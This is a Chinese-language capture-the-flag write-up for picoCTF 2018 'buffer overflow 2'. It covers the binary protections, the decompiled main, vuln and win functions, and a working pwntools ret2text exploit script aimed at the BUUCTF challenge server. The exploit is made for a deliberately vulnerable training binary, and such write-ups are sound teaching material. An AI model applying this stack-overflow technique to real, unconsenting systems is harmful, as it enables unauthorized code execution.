picoctf 2018 buffer overflow 2
# picoctf 2018 buffer overflow 2
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/picoctf_2018_buffer_overflow_2/PicoCTF_2018_buffer_overflow_2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t v3; // ST1C_4
setvbuf(_bss_start, 0, 2, 0);
v3 = getegid();
setresgid(v3, v3, v3);
puts("Please enter your string: ");
vuln();
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
vuln函数如下:
int vuln()
{
char s; // [esp+Ch] [ebp-6Ch]
gets(&s);
return puts(&s);
}
1
2
3
4
5
6
7
2
3
4
5
6
7
win函数如下:
char *__cdecl win(int a1, int a2)
{
char *result; // eax
char s; // [esp+Ch] [ebp-4Ch]
FILE *stream; // [esp+4Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
result = fgets(&s, 64, stream);
if ( a1 == -559038737 && a2 == -559038242 )
result = (char *)printf(&s);
return result;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 思路分析
目前信息:
vuln函数存在任意长度的溢出点win函数可打印flag- No canary found
- NX enabled
- No PIE
思路:
- 32位
ret2text
- 32位
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']
pwnfile = '/root/pwn/buuctf/picoctf_2018_buffer_overflow_2/PicoCTF_2018_buffer_overflow_2'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 25738)
elf = ELF(pwnfile)
padding = 0x6c+4
win_addr = elf.symbols['win']
exit_addr = elf.plt['exit']
a1 = 0xDEADBEEF #补码形式
a2 = 0xDEADC0DE #补码形式
payload = flat(['a'*padding, win_addr, exit_addr, a1, a2])
io.sendlineafter('Please enter your string: \n', payload)
io.recvuntil('\n')
print(io.recv())
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
上次更新: 2022/08/15, 00:29:49